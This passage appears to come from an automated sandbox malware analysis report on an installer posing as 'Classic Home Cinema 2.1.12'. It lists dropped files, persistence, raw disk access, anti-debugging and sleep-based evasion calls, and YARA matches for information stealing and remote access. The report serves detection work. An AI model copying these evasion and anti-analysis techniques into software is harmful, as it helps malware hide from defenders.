                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_004056A0 push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_004517F8 push 0045182Bh; ret 1_2_00451823
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_004519BC push ecx; mov dword ptr [esp], eax1_2_004519C1
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_00477B08 push ecx; mov dword ptr [esp], edx1_2_00477B09
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_00419C28 push ecx; mov dword ptr [esp], ecx1_2_00419C2D
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_0045FD1C push ecx; mov dword ptr [esp], ecx1_2_0045FD20
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_00499D30 pushad ; retf 1_2_00499D3F
                    Source: classichomecinema.exe.1.drStatic PE information: section name: .amtt4 entropy: 7.750849017599865
                    Source: ClassicHomeCinema.exe.2.drStatic PE information: section name: .amtt4 entropy: 7.750849017599865

                    Persistence and Installation Behavior

                    barindex
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive02_2_00ABE8A2
                    Source: C:\Users\user\Desktop\EQ5Vcf19u8.exeFile created: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpFile created: C:\Users\user\AppData\Local\Temp\is-DJUE0.tmp\_isetup\_shfoldr.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpFile created: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\is-T75LM.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpFile created: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\is-0BQ7F.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpFile created: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\is-RQ64T.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpFile created: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\msvcr71.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeFile created: C:\ProgramData\ClassicHomeCinema\ClassicHomeCinema.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpFile created: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpFile created: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\uninstall\unins000.exe (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeFile created: C:\ProgramData\ClassicHomeCinema\sqlite3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpFile created: C:\Users\user\AppData\Local\Temp\is-DJUE0.tmp\_isetup\_setup64.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpFile created: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\uninstall\is-G4VDT.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpFile created: C:\Users\user\AppData\Local\Temp\is-DJUE0.tmp\_isetup\_iscrypt.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpFile created: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\msvcp71.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpFile created: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\gdiplus.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpFile created: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\sqlite3.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpFile created: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\is-E3J5R.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpFile created: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\is-7MGOG.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpFile created: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeFile created: C:\ProgramData\ClassicHomeCinema\ClassicHomeCinema.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeFile created: C:\ProgramData\ClassicHomeCinema\sqlite3.dllJump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive02_2_00ABE8A2
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_0040D758 StartServiceCtrlDispatcherA,2_2_0040D758
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_00423C0C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423C0C
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_00423C0C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423C0C
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_004241DC IsIconic,SetActiveWindow,SetFocus,1_2_004241DC
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_00424194 IsIconic,SetActiveWindow,1_2_00424194
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_00418384 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,1_2_00418384
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_0042285C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,1_2_0042285C
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_00417598 IsIconic,GetCapture,1_2_00417598
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_0048393C IsIconic,GetWindowLongA,ShowWindow,ShowWindow,1_2_0048393C
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_00417CCE IsIconic,SetWindowPos,1_2_00417CCE
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_00417CD0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,1_2_00417CD0
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_0041F118 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,1_2_0041F118
                    Source: C:\Users\user\Desktop\EQ5Vcf19u8.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_60920C91 rdtsc 2_2_60920C91
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,2_2_00ABE9A6
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-DJUE0.tmp\_isetup\_shfoldr.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\is-T75LM.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\is-0BQ7F.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\is-RQ64T.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\msvcr71.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\uninstall\unins000.exe (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-DJUE0.tmp\_isetup\_setup64.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\uninstall\is-G4VDT.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-DJUE0.tmp\_isetup\_iscrypt.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\msvcp71.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\gdiplus.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\is-E3J5R.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\is-7MGOG.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.dll (copy)Jump to dropped file
                    Source: C:\Users\user\Desktop\EQ5Vcf19u8.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-5972
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_2-61514
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeAPI coverage: 4.6 %
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exe TID: 7644Thread sleep count: 81 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exe TID: 7644Thread sleep time: -162000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exe TID: 7100Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exe TID: 7100Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeFile opened: PhysicalDrive0Jump to behavior
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_00452A60 FindFirstFileA,GetLastError,1_2_00452A60
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_00474F88 FindFirstFileA,FindNextFileA,FindClose,1_2_00474F88
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_004980A4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_004980A4
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_00464158 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00464158
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_00462750 FindFirstFileA,FindNextFileA,FindClose,1_2_00462750
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_00463CDC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463CDC
                    Source: C:\Users\user\Desktop\EQ5Vcf19u8.exeCode function: 0_2_00409B78 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,0_2_00409B78
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeThread delayed: delay time: 60000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeThread delayed: delay time: 60000Jump to behavior
                    Source: classichomecinema.exe, 00000002.00000002.3555336843.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, classichomecinema.exe, 00000002.00000002.3556348800.00000000033E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: classichomecinema.exe, 00000002.00000002.3556348800.00000000033E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWWGLM
                    Source: C:\Users\user\Desktop\EQ5Vcf19u8.exeAPI call chain: ExitProcess graph end nodegraph_0-6769
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeAPI call chain: ExitProcess graph end nodegraph_2-61668
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_2-61410
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_60920C91 rdtsc 2_2_60920C91
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_00AC80F0 IsDebuggerPresent,2_2_00AC80F0
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_00ACE6AE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,2_2_00ACE6AE
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_004502C0 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004502C0
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_00AB5E59 RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,2_2_00AB5E59
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_00AC80DA SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00AC80DA
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_00478504 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,1_2_00478504
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_0042E09C AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,1_2_0042E09C
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_00ABE85A cpuid 2_2_00ABE85A
                    Source: C:\Users\user\Desktop\EQ5Vcf19u8.exeCode function: GetLocaleInfoA,0_2_0040520C
                    Source: C:\Users\user\Desktop\EQ5Vcf19u8.exeCode function: GetLocaleInfoA,0_2_00405258
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: GetLocaleInfoA,1_2_00408568
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: GetLocaleInfoA,1_2_004085B4
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_004585C8 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,1_2_004585C8
                    Source: C:\Users\user\Desktop\EQ5Vcf19u8.exeCode function: 0_2_004026C4 GetSystemTime,0_2_004026C4
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_0045559C GetUserNameA,1_2_0045559C
                    Source: C:\Users\user\Desktop\EQ5Vcf19u8.exeCode function: 0_2_00405CF4 GetVersionExA,0_2_00405CF4

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 00000002.00000002.3556027586.0000000002AE6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.3555577941.0000000000AB1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: classichomecinema.exe PID: 7640, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 00000002.00000002.3556027586.0000000002AE6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.3555577941.0000000000AB1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: classichomecinema.exe PID: 7640, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_609660FA sqlite3_finalize,sqlite3_free,sqlite3_value_numeric_type,sqlite3_value_numeric_type,sqlite3_value_text,sqlite3_value_int,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_mprintf,sqlite3_malloc,sqlite3_free,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,2_2_609660FA
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6090C1D6 sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,2_2_6090C1D6
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_60963143 sqlite3_stricmp,sqlite3_bind_int64,sqlite3_mutex_leave,2_2_60963143
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6096A2BD sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,2_2_6096A2BD
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6096923E sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_malloc,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_realloc,sqlite3_realloc,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,2_2_6096923E
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6096A38C sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,2_2_6096A38C
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6096748C sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_reset,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_bind_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_reset,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_realloc,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,2_2_6096748C
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_609254B1 sqlite3_bind_zeroblob,sqlite3_mutex_leave,2_2_609254B1
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6094B407 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,2_2_6094B407
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6090F435 sqlite3_bind_parameter_index,2_2_6090F435
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_609255D4 sqlite3_mutex_leave,sqlite3_bind_text16,2_2_609255D4
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_609255FF sqlite3_bind_text,2_2_609255FF
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6096A5EE sqlite3_value_text,sqlite3_value_bytes,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_malloc,sqlite3_column_int,sqlite3_column_int64,sqlite3_column_text,sqlite3_column_bytes,sqlite3_finalize,sqlite3_step,sqlite3_free,sqlite3_finalize,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_column_int64,sqlite3_column_int,sqlite3_column_text,sqlite3_column_bytes,sqlite3_step,sqlite3_finalize,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_malloc,sqlite3_bind_null,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_value_text,sqlite3_value_bytes,sqlite3_free,2_2_6096A5EE
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6094B54C sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,memmove,2_2_6094B54C
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_60925686 sqlite3_bind_int64,sqlite3_mutex_leave,2_2_60925686
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6094A6C5 sqlite3_bind_int64,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_malloc,sqlite3_reset,sqlite3_free,2_2_6094A6C5
